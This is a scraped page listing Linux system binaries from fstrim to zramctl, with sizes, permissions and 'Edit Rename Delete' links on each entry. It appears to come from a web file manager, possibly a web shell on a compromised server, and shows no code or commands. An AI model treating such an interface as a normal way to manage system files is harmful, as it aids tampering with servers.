    fstrim 70.23 KB -rwxr-xr-x Edit Rename Delete
    gdisk 210.48 KB -rwxr-xr-x Edit Rename Delete
    gdm3 442.67 KB -rwxr-xr-x Edit Rename Delete
    genccode 14.71 KB -rwxr-xr-x Edit Rename Delete
    gencmn 14.75 KB -rwxr-xr-x Edit Rename Delete
    genl 82.29 KB -rwxr-xr-x Edit Rename Delete
    gennorm2 62.9 KB -rwxr-xr-x Edit Rename Delete
    gensprep 26.8 KB -rwxr-xr-x Edit Rename Delete
    getcap 14.3 KB -rwxr-xr-x Edit Rename Delete
    getpcaps 14.3 KB -rwxr-xr-x Edit Rename Delete
    getty 67.38 KB -rwxr-xr-x Edit Rename Delete
    gnome-menus-blacklist 2.23 KB -rwxr-xr-x Edit Rename Delete
    groupadd 90.95 KB -rwxr-xr-x Edit Rename Delete
    groupdel 86.77 KB -rwxr-xr-x Edit Rename Delete
    groupmems 62.24 KB -rwxr-xr-x Edit Rename Delete
    groupmod 94.86 KB -rwxr-xr-x Edit Rename Delete
    grpck 62.18 KB -rwxr-xr-x Edit Rename Delete
    grpconv 58.05 KB -rwxr-xr-x Edit Rename Delete
    grpunconv 58.05 KB -rwxr-xr-x Edit Rename Delete
    grub-bios-setup 909.34 KB -rwxr-xr-x Edit Rename Delete
    grub-install 1.11 MB -rwxr-xr-x Edit Rename Delete
    grub-macbless 897.03 KB -rwxr-xr-x Edit Rename Delete
    grub-mkconfig 8.54 KB -rwxr-xr-x Edit Rename Delete
    grub-mkdevicemap 215.7 KB -rwxr-xr-x Edit Rename Delete
    grub-probe 905.28 KB -rwxr-xr-x Edit Rename Delete
    grub-reboot 4.73 KB -rwxr-xr-x Edit Rename Delete
    grub-set-default 3.47 KB -rwxr-xr-x Edit Rename Delete
    halt 973.23 KB -rwxr-xr-x Edit Rename Delete
    hdparm 140.34 KB -rwxr-xr-x Edit Rename Delete
    httxt2dbm 14.15 KB -rwxr-xr-x Edit Rename Delete
    hwclock 102.35 KB -rwxr-xr-x Edit Rename Delete
    iconvconfig 30.4 KB -rwxr-xr-x Edit Rename Delete
    icupkg 23.07 KB -rwxr-xr-x Edit Rename Delete
    ifconfig 81.27 KB -rwxr-xr-x Edit Rename Delete
    iio-sensor-proxy 66.99 KB -rwxr-xr-x Edit Rename Delete
    init 1.55 MB -rwxr-xr-x Edit Rename Delete
    insmod 170.34 KB -rwxr-xr-x Edit Rename Delete
    install-sgmlcatalog 4.44 KB -rwxr-xr-x Edit Rename Delete
    installkernel 2.58 KB -rwxr-xr-x Edit Rename Delete
    integritysetup 60.23 KB -rwxr-xr-x Edit Rename Delete
    invoke-rc.d 16.64 KB -rwxr-xr-x Edit Rename Delete
    ip 597.62 KB -rwxr-xr-x Edit Rename Delete
    ip6tables 96.97 KB -rwxr-xr-x Edit Rename Delete
    ip6tables-apply 6.89 KB -rwxr-xr-x Edit Rename Delete
    ip6tables-legacy 96.97 KB -rwxr-xr-x Edit Rename Delete
    ip6tables-legacy-restore 96.97 KB -rwxr-xr-x Edit Rename Delete
    ip6tables-legacy-save 96.97 KB -rwxr-xr-x Edit Rename Delete
    ip6tables-nft 215.32 KB -rwxr-xr-x Edit Rename Delete
    ip6tables-nft-restore 215.32 KB -rwxr-xr-x Edit Rename Delete
    ip6tables-nft-save 215.32 KB -rwxr-xr-x Edit Rename Delete
    ip6tables-restore 96.97 KB -rwxr-xr-x Edit Rename Delete
    ip6tables-restore-translate 215.32 KB -rwxr-xr-x Edit Rename Delete
    ip6tables-save 96.97 KB -rwxr-xr-x Edit Rename Delete
    ip6tables-translate 215.32 KB -rwxr-xr-x Edit Rename Delete
    ipmaddr 18.15 KB -rwxr-xr-x Edit Rename Delete
    iptables 96.97 KB -rwxr-xr-x Edit Rename Delete
    iptables-apply 6.89 KB -rwxr-xr-x Edit Rename Delete
    iptables-legacy 96.97 KB -rwxr-xr-x Edit Rename Delete
    iptables-legacy-restore 96.97 KB -rwxr-xr-x Edit Rename Delete
    iptables-legacy-save 96.97 KB -rwxr-xr-x Edit Rename Delete
    iptables-nft 215.32 KB -rwxr-xr-x Edit Rename Delete
    iptables-nft-restore 215.32 KB -rwxr-xr-x Edit Rename Delete
    iptables-nft-save 215.32 KB -rwxr-xr-x Edit Rename Delete
    iptables-restore 96.97 KB -rwxr-xr-x Edit Rename Delete
    iptables-restore-translate 215.32 KB -rwxr-xr-x Edit Rename Delete
    iptables-save 96.97 KB -rwxr-xr-x Edit Rename Delete
    iptables-translate 215.32 KB -rwxr-xr-x Edit Rename Delete
    iptunnel 26.15 KB -rwxr-xr-x Edit Rename Delete
    irqbalance 62.92 KB -rwxr-xr-x Edit Rename Delete
    irqbalance-ui 34.38 KB -rwxr-xr-x Edit Rename Delete
    iscsi-iname 18.15 KB -rwxr-xr-x Edit Rename Delete
    iscsi_discovery 5.16 KB -rwxr-xr-x Edit Rename Delete
    iscsiadm 394.1 KB -rwxr-xr-x Edit Rename Delete
    iscsid 410.3 KB -rwxr-xr-x Edit Rename Delete
    iscsistart 366.29 KB -rwxr-xr-x Edit Rename Delete
    isosize 30.23 KB -rwxr-xr-x Edit Rename Delete
    ispell-autobuildhash 15.39 KB -rwxr-xr-x Edit Rename Delete
    iw 262.82 KB -rwxr-xr-x Edit Rename Delete
    kbdrate 13.99 KB -rwxr-xr-x Edit Rename Delete
    killall5 26.38 KB -rwxr-xr-x Edit Rename Delete
    kpartx 46.16 KB -rwxr-xr-x Edit Rename Delete
    ldattach 34.23 KB -rwxr-xr-x Edit Rename Delete
    ldconfig 0.38 KB -rwxr-xr-x Edit Rename Delete
    ldconfig.real 1 MB -rwxr-xr-x Edit Rename Delete
    locale-gen 4.3 KB -rwxr-xr-x Edit Rename Delete
    logrotate 82.09 KB -rwxr-xr-x Edit Rename Delete
    logsave 14.16 KB -rwxr-xr-x Edit Rename Delete
    losetup 110.34 KB -rwxr-xr-x Edit Rename Delete
    lsmod 170.34 KB -rwxr-xr-x Edit Rename Delete
    luksformat 3.32 KB -rwxr-xr-x Edit Rename Delete
    lvchange 2.73 MB -rwxr-xr-x Edit Rename Delete
    lvconvert 2.73 MB -rwxr-xr-x Edit Rename Delete
    lvcreate 2.73 MB -rwxr-xr-x Edit Rename Delete
    lvdisplay 2.73 MB -rwxr-xr-x Edit Rename Delete
    lvextend 2.73 MB -rwxr-xr-x Edit Rename Delete
    lvm 2.73 MB -rwxr-xr-x Edit Rename Delete
    lvmconfig 2.73 MB -rwxr-xr-x Edit Rename Delete
    lvmdiskscan 2.73 MB -rwxr-xr-x Edit Rename Delete
    lvmdump 10.07 KB -rwxr-xr-x Edit Rename Delete
    lvmpolld 232.05 KB -rwxr-xr-x Edit Rename Delete
    lvmsadc 2.73 MB -rwxr-xr-x Edit Rename Delete
    lvmsar 2.73 MB -rwxr-xr-x Edit Rename Delete
    lvreduce 2.73 MB -rwxr-xr-x Edit Rename Delete
    lvremove 2.73 MB -rwxr-xr-x Edit Rename Delete
    lvrename 2.73 MB -rwxr-xr-x Edit Rename Delete
    lvresize 2.73 MB -rwxr-xr-x Edit Rename Delete
    lvs 2.73 MB -rwxr-xr-x Edit Rename Delete
    lvscan 2.73 MB -rwxr-xr-x Edit Rename Delete
    make-bcache 22.23 KB -rwxr-xr-x Edit Rename Delete
    make-ssl-cert 3.78 KB -rwxr-xr-x Edit Rename Delete
    mdadm 589.65 KB -rwxr-xr-x Edit Rename Delete
    mdmon 325.49 KB -rwxr-xr-x Edit Rename Delete
    mii-tool 26.62 KB -rwxr-xr-x Edit Rename Delete
    mkdosfs 34.5 KB -rwxr-xr-x Edit Rename Delete
    mke2fs 134.62 KB -rwxr-xr-x Edit Rename Delete
    mkfs 14.23 KB -rwxr-xr-x Edit Rename Delete
    mkfs.bfs 34.23 KB -rwxr-xr-x Edit Rename Delete
    mkfs.btrfs 451.53 KB -rwxr-xr-x Edit Rename Delete
    mkfs.cramfs 42.16 KB -rwxr-xr-x Edit Rename Delete
    mkfs.ext2 134.62 KB -rwxr-xr-x Edit Rename Delete
    mkfs.ext3 134.62 KB -rwxr-xr-x Edit Rename Delete
    mkfs.ext4 134.62 KB -rwxr-xr-x Edit Rename Delete
    mkfs.fat 34.5 KB -rwxr-xr-x Edit Rename Delete
    mkfs.minix 106.23 KB -rwxr-xr-x Edit Rename Delete
    mkfs.msdos 34.5 KB -rwxr-xr-x Edit Rename Delete
    mkfs.ntfs 86.27 KB -rwxr-xr-x Edit Rename Delete
    mkfs.vfat 34.5 KB -rwxr-xr-x Edit Rename Delete
    mkfs.xfs 366.24 KB -rwxr-xr-x Edit Rename Delete
    mkhomedir_helper 22.17 KB -rwxr-xr-x Edit Rename Delete
    mkinitramfs 11.55 KB -rwxr-xr-x Edit Rename Delete
    mklost+found 14.3 KB -rwxr-xr-x Edit Rename Delete
    mkntfs 86.27 KB -rwxr-xr-x Edit Rename Delete
    mkswap 106.23 KB -rwxr-xr-x Edit Rename Delete
    modinfo 170.34 KB -rwxr-xr-x Edit Rename Delete
    modprobe 170.34 KB -rwxr-xr-x Edit Rename Delete
    mount.fuse 14.15 KB -rwxr-xr-x Edit Rename Delete
    mount.lowntfs-3g 118.86 KB -rwxr-xr-x Edit Rename Delete
    mount.ntfs 158.89 KB -rwxr-xr-x Edit Rename Delete
    mount.ntfs-3g 158.89 KB -rwxr-xr-x Edit Rename Delete
    mount.vmhgfs 46.48 KB -rwxr-xr-x Edit Rename Delete
    mpathpersist 31.05 KB -rwxr-xr-x Edit Rename Delete
    multipath 34.15 KB -rwxr-xr-x Edit Rename Delete
    multipathd 126.2 KB -rwxr-xr-x Edit Rename Delete
    mysqld 64.37 MB -rwxr-xr-x Edit Rename Delete
    nameif 18.3 KB -rwxr-xr-x Edit Rename Delete
    netplan 0.78 KB -rwxr-xr-x Edit Rename Delete
    newusers 98.8 KB -rwxr-xr-x Edit Rename Delete
    nfnl_osf 18.3 KB -rwxr-xr-x Edit Rename Delete
    nologin 14.3 KB -rwxr-xr-x Edit Rename Delete
    ntfsclone 58.27 KB -rwxr-xr-x Edit Rename Delete
    ntfscp 42.26 KB -rwxr-xr-x Edit Rename Delete
    ntfslabel 34.26 KB -rwxr-xr-x Edit Rename Delete
    ntfsresize 78.27 KB -rwxr-xr-x Edit Rename Delete
    ntfsundelete 54.26 KB -rwxr-xr-x Edit Rename Delete
    ntp-keygen 81.85 KB -rwxr-xr-x Edit Rename Delete
    ntp-wait 3.13 KB -rwxr-xr-x Edit Rename Delete
    ntpd 819.09 KB -rwxr-xr-x Edit Rename Delete
    ntptime 22.27 KB -rwxr-xr-x Edit Rename Delete
    on_ac_power 2.18 KB -rwxr-xr-x Edit Rename Delete
    overlayroot-chroot 2.45 KB -rwxr-xr-x Edit Rename Delete
    ownership 14.45 KB -rwxr-xr-x Edit Rename Delete
    pam-auth-update 19.86 KB -rwxr-xr-x Edit Rename Delete
    pam_extrausers_chkpwd 42.16 KB -rwxr-sr-x Edit Rename Delete
    pam_extrausers_update 42.16 KB -rwxr-xr-x Edit Rename Delete
    pam_getenv 2.82 KB -rwxr-xr-x Edit Rename Delete
    pam_tally 14.16 KB -rwxr-xr-x Edit Rename Delete
    pam_tally2 18.16 KB -rwxr-xr-x Edit Rename Delete
    pam_timestamp_check 14.15 KB -rwxr-xr-x Edit Rename Delete
    parted 86.25 KB -rwxr-xr-x Edit Rename Delete
    partprobe 14.23 KB -rwxr-xr-x Edit Rename Delete
    pdata_tools 1.29 MB -rwxr-xr-x Edit Rename Delete
    phpdismod 7.11 KB -rwxr-xr-x Edit Rename Delete
    phpenmod 7.11 KB -rwxr-xr-x Edit Rename Delete
    phpquery 6.24 KB -rwxr-xr-x Edit Rename Delete
    pivot_root 14.23 KB -rwxr-xr-x Edit Rename Delete
    plipconfig 14.15 KB -rwxr-xr-x Edit Rename Delete
    plymouthd 146.41 KB -rwxr-xr-x Edit Rename Delete
    popcon-largest-unused 0.53 KB -rwxr-xr-x Edit Rename Delete
    popularity-contest 5.23 KB -rwxr-xr-x Edit Rename Delete
    poweroff 973.23 KB -rwxr-xr-x Edit Rename Delete
    pppd 385.88 KB -rwsr-xr-- Edit Rename Delete
    pppdump 18.26 KB -rwxr-xr-x Edit Rename Delete
    pppoe-discovery 22.15 KB -rwxr-xr-x Edit Rename Delete
    pppstats 18.15 KB -rwxr-xr-x Edit Rename Delete
    pptp 71.13 KB -rwxr-xr-x Edit Rename Delete
    pptpsetup 6.46 KB -rwxr-xr-x Edit Rename Delete
    pvchange 2.73 MB -rwxr-xr-x Edit Rename Delete
    pvck 2.73 MB -rwxr-xr-x Edit Rename Delete
    pvcreate 2.73 MB -rwxr-xr-x Edit Rename Delete
    pvdisplay 2.73 MB -rwxr-xr-x Edit Rename Delete
    pvmove 2.73 MB -rwxr-xr-x Edit Rename Delete
    pvremove 2.73 MB -rwxr-xr-x Edit Rename Delete
    pvresize 2.73 MB -rwxr-xr-x Edit Rename Delete
    pvs 2.73 MB -rwxr-xr-x Edit Rename Delete
    pvscan 2.73 MB -rwxr-xr-x Edit Rename Delete
    pwck 58.17 KB -rwxr-xr-x Edit Rename Delete
    pwconv 54.05 KB -rwxr-xr-x Edit Rename Delete
    pwunconv 54.05 KB -rwxr-xr-x Edit Rename Delete
    rarp 36.61 KB -rwxr-xr-x Edit Rename Delete
    raw 14.23 KB -rwxr-xr-x Edit Rename Delete
    readprofile 22.26 KB -rwxr-xr-x Edit Rename Delete
    reboot 973.23 KB -rwxr-xr-x Edit Rename Delete
    regdbdump 9.99 KB -rwxr-xr-x Edit Rename Delete
    remove-default-ispell 2.86 KB -rwxr-xr-x Edit Rename Delete
    remove-default-wordlist 2.86 KB -rwxr-xr-x Edit Rename Delete
    remove-shell 0.88 KB -rwxr-xr-x Edit Rename Delete
    resize2fs 66.38 KB -rwxr-xr-x Edit Rename Delete
    rmmod 170.34 KB -rwxr-xr-x Edit Rename Delete
    rmt 58.55 KB -rwxr-xr-x Edit Rename Delete
    rmt-tar 58.55 KB -rwxr-xr-x Edit Rename Delete
    route 68.46 KB -rwxr-xr-x Edit Rename Delete
    rsyslogd 710.2 KB -rwxr-xr-x Edit Rename Delete
    rtacct 48.29 KB -rwxr-xr-x Edit Rename Delete
    rtcwake 46.23 KB -rwxr-xr-x Edit Rename Delete
    rtkitctl 14.21 KB -rwxr-xr-x Edit Rename Delete
    rtmon 78.24 KB -rwxr-xr-x Edit Rename Delete
    runlevel 973.23 KB -rwxr-xr-x Edit Rename Delete
    runuser 66.23 KB -rwxr-xr-x Edit Rename Delete
    select-default-ispell 3.23 KB -rwxr-xr-x Edit Rename Delete
    select-default-wordlist 3.21 KB -rwxr-xr-x Edit Rename Delete
    service 9.04 KB -rwxr-xr-x Edit Rename Delete
    setcap 14.3 KB -rwxr-xr-x Edit Rename Delete
    setvesablank 14.07 KB -rwxr-xr-x Edit Rename Delete
    setvtrgb 14.13 KB -rwxr-xr-x Edit Rename Delete
    sfdisk 138.23 KB -rwxr-xr-x Edit Rename Delete
    sgdisk 190.48 KB -rwxr-xr-x Edit Rename Delete
    shadowconfig 0.86 KB -rwxr-xr-x Edit Rename Delete
    shutdown 973.23 KB -rwxr-xr-x Edit Rename Delete
    slattach 44.61 KB -rwxr-xr-x Edit Rename Delete
    split-logfile 2.36 KB -rwxr-xr-x Edit Rename Delete
    sshd 863.79 KB -rwxr-xr-x Edit Rename Delete
    start-stop-daemon 47.32 KB -rwxr-xr-x Edit Rename Delete
    sulogin 50.23 KB -rwxr-xr-x Edit Rename Delete
    swaplabel 18.23 KB -rwxr-xr-x Edit Rename Delete
    swapoff 22.23 KB -rwxr-xr-x Edit Rename Delete
    swapon 50.23 KB -rwxr-xr-x Edit Rename Delete
    switch_root 14.23 KB -rwxr-xr-x Edit Rename Delete
    sysctl 30.23 KB -rwxr-xr-x Edit Rename Delete
    tarcat 0.91 KB -rwxr-xr-x Edit Rename Delete
    tc 529.45 KB -rwxr-xr-x Edit Rename Delete
    tcpdump 1019.76 KB -rwxr-xr-x Edit Rename Delete
    telinit 973.23 KB -rwxr-xr-x Edit Rename Delete
    thin_check 1.29 MB -rwxr-xr-x Edit Rename Delete
    thin_delta 1.29 MB -rwxr-xr-x Edit Rename Delete
    thin_dump 1.29 MB -rwxr-xr-x Edit Rename Delete
    thin_ls 1.29 MB -rwxr-xr-x Edit Rename Delete
    thin_metadata_size 1.29 MB -rwxr-xr-x Edit Rename Delete
    thin_repair 1.29 MB -rwxr-xr-x Edit Rename Delete
    thin_restore 1.29 MB -rwxr-xr-x Edit Rename Delete
    thin_rmap 1.29 MB -rwxr-xr-x Edit Rename Delete
    thin_trim 1.29 MB -rwxr-xr-x Edit Rename Delete
    tipc 126.23 KB -rwxr-xr-x Edit Rename Delete
    tune2fs 106.55 KB -rwxr-xr-x Edit Rename Delete
    tzconfig 0.1 KB -rwxr-xr-x Edit Rename Delete
    ufw 4.82 KB -rwxr-xr-x Edit Rename Delete
    umount.udisks2 14.3 KB -rwxr-xr-x Edit Rename Delete
    unix_chkpwd 42.15 KB -rwxr-sr-x Edit Rename Delete
    unix_update 42.15 KB -rwxr-xr-x Edit Rename Delete
    update-ca-certificates 5.29 KB -rwxr-xr-x Edit Rename Delete
    update-catalog 9.15 KB -rwxr-xr-x Edit Rename Delete
    update-default-aspell 1 KB -rwxr-xr-x Edit Rename Delete
    update-default-ispell 9.68 KB -rwxr-xr-x Edit Rename Delete
    update-default-wordlist 7.5 KB -rwxr-xr-x Edit Rename Delete
    update-dictcommon-aspell 1 KB -rwxr-xr-x Edit Rename Delete
    update-dictcommon-hunspell 0.76 KB -rwxr-xr-x Edit Rename Delete
    update-fonts-alias 5.71 KB -rwxr-xr-x Edit Rename Delete
    update-fonts-dir 3.98 KB -rwxr-xr-x Edit Rename Delete
    update-fonts-scale 6.1 KB -rwxr-xr-x Edit Rename Delete
    update-grub 0.06 KB -rwxr-xr-x Edit Rename Delete
    update-grub-gfxpayload 0.29 KB -rwxr-xr-x Edit Rename Delete
    update-grub2 0.06 KB -rwxr-xr-x Edit Rename Delete
    update-icon-caches 0.58 KB -rwxr-xr-x Edit Rename Delete
    update-info-dir 1.66 KB -rwxr-xr-x Edit Rename Delete
    update-initramfs 7.25 KB -rwxr-xr-x Edit Rename Delete
    update-locale 2.99 KB -rwxr-xr-x Edit Rename Delete
    update-mime 9.18 KB -rwxr-xr-x Edit Rename Delete
    update-passwd 34.56 KB -rwxr-xr-x Edit Rename Delete
    update-pciids 1.71 KB -rwxr-xr-x Edit Rename Delete
    update-rc.d 16.76 KB -rwxr-xr-x Edit Rename Delete
    update-secureboot-policy 7.43 KB -rwxr-xr-x Edit Rename Delete
    update-xmlcatalog 16.88 KB -rwxr-xr-x Edit Rename Delete
    upgrade-from-grub-legacy 1.49 KB -rwxr-xr-x Edit Rename Delete
    usb_modeswitch 59.66 KB -rwxr-xr-x Edit Rename Delete
    usb_modeswitch_dispatcher 54.32 KB -rwxr-xr-x Edit Rename Delete
    usbmuxd 86.57 KB -rwxr-xr-x Edit Rename Delete
    useradd 143.71 KB -rwxr-xr-x Edit Rename Delete
    userdel 98.89 KB -rwxr-xr-x Edit Rename Delete
    usermod 139.49 KB -rwxr-xr-x Edit Rename Delete
    uuidd 42.3 KB -rwxr-xr-x Edit Rename Delete
    validlocale 1.73 KB -rwxr-xr-x Edit Rename Delete
    vcstime 13.99 KB -rwxr-xr-x Edit Rename Delete
    veritysetup 51.82 KB -rwxr-xr-x Edit Rename Delete
    vgcfgbackup 2.73 MB -rwxr-xr-x Edit Rename Delete
    vgcfgrestore 2.73 MB -rwxr-xr-x Edit Rename Delete
    vgchange 2.73 MB -rwxr-xr-x Edit Rename Delete
    vgck 2.73 MB -rwxr-xr-x Edit Rename Delete
    vgconvert 2.73 MB -rwxr-xr-x Edit Rename Delete
    vgcreate 2.73 MB -rwxr-xr-x Edit Rename Delete
    vgdisplay 2.73 MB -rwxr-xr-x Edit Rename Delete
    vgexport 2.73 MB -rwxr-xr-x Edit Rename Delete
    vgextend 2.73 MB -rwxr-xr-x Edit Rename Delete
    vgimport 2.73 MB -rwxr-xr-x Edit Rename Delete
    vgimportclone 2.73 MB -rwxr-xr-x Edit Rename Delete
    vgmerge 2.73 MB -rwxr-xr-x Edit Rename Delete
    vgmknodes 2.73 MB -rwxr-xr-x Edit Rename Delete
    vgreduce 2.73 MB -rwxr-xr-x Edit Rename Delete
    vgremove 2.73 MB -rwxr-xr-x Edit Rename Delete
    vgrename 2.73 MB -rwxr-xr-x Edit Rename Delete
    vgs 2.73 MB -rwxr-xr-x Edit Rename Delete
    vgscan 2.73 MB -rwxr-xr-x Edit Rename Delete
    vgsplit 2.73 MB -rwxr-xr-x Edit Rename Delete
    vigr 68.55 KB -rwxr-xr-x Edit Rename Delete
    vipw 68.55 KB -rwxr-xr-x Edit Rename Delete
    visudo 218.2 KB -rwxr-xr-x Edit Rename Delete
    vpddecode 18.58 KB -rwxr-xr-x Edit Rename Delete
    wipefs 46.23 KB -rwxr-xr-x Edit Rename Delete
    wpa_action 1.69 KB -rwxr-xr-x Edit Rename Delete
    wpa_cli 152.22 KB -rwxr-xr-x Edit Rename Delete
    wpa_supplicant 2.77 MB -rwxr-xr-x Edit Rename Delete
    xfs_admin 1.38 KB -rwxr-xr-x Edit Rename Delete
    xfs_bmap 0.68 KB -rwxr-xr-x Edit Rename Delete
    xfs_copy 90.28 KB -rwxr-xr-x Edit Rename Delete
    xfs_db 620.09 KB -rwxr-xr-x Edit Rename Delete
    xfs_estimate 14.01 KB -rwxr-xr-x Edit Rename Delete
    xfs_freeze 0.78 KB -rwxr-xr-x Edit Rename Delete
    xfs_fsr 42.02 KB -rwxr-xr-x Edit Rename Delete
    xfs_growfs 34.14 KB -rwxr-xr-x Edit Rename Delete
    xfs_info 1.26 KB -rwxr-xr-x Edit Rename Delete
    xfs_io 187.34 KB -rwxr-xr-x Edit Rename Delete
    xfs_logprint 74.15 KB -rwxr-xr-x Edit Rename Delete
    xfs_mdrestore 30.02 KB -rwxr-xr-x Edit Rename Delete
    xfs_metadump 0.76 KB -rwxr-xr-x Edit Rename Delete
    xfs_mkfile 1.02 KB -rwxr-xr-x Edit Rename Delete
    xfs_ncheck 0.67 KB -rwxr-xr-x Edit Rename Delete
    xfs_quota 86.01 KB -rwxr-xr-x Edit Rename Delete
    xfs_repair 563.15 KB -rwxr-xr-x Edit Rename Delete
    xfs_rtcp 17.99 KB -rwxr-xr-x Edit Rename Delete
    xfs_scrub 102.11 KB -rwxr-xr-x Edit Rename Delete
    xfs_scrub_all 5.86 KB -rwxr-xr-x Edit Rename Delete
    xfs_spaceman 42.15 KB -rwxr-xr-x Edit Rename Delete
    xtables-legacy-multi 96.97 KB -rwxr-xr-x Edit Rename Delete
    xtables-monitor 215.32 KB -rwxr-xr-x Edit Rename Delete
    xtables-nft-multi 215.32 KB -rwxr-xr-x Edit Rename Delete
    zerofree 9.99 KB -rwxr-xr-x Edit Rename Delete
    zic 62.29 KB -rwxr-xr-x Edit Rename Delete
    zramctl 114.34 KB -rwxr-xr-x Edit Rename Delete